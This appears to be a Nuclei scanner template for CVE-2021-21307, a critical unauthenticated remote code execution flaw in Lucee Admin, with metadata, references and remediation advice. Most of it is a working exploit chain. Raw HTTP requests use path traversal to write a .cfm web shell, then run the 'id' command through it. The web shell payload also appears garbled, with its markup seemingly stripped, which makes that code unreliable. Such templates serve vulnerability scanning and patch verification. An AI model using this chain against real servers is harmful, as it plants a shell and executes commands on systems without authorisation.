id: CVE-2021-21307

info:
  name: Lucee Admin - Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
  reference:
    - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
    - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
    - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response
    - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-21307
    cwe-id: CWE-862
    epss-score: 0.97313
    epss-percentile: 0.99874
    cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: lucee
    product: lucee_server
  tags: cve2021,cve,rce,lucee,adobe

http:
  - raw:
      - |
        POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        imgSrc=a

      - |
        POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        imgSrc=
        Command:value="#form.cmd#">
        Options: value="#form.opts#">
        Timeout: value="#form.timeout#" value="5">
        # HTMLCodeFormat(myVar)#

      - |
        POST /lucee/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded

        cmd=id&opts=&timeout=5

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "groups="
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "(u|g)id=.*"
# digest: 490a0046304402201d3958e2205541727edfc0220248d3d5bb9bcda9884e707e81a5b962adc9ea8a02203c5be8f6e614ee645c8a09df29eda44f5d8c262c4f4da023266c8c652323cb0e:922c64590222798bb761d5b6d8e72950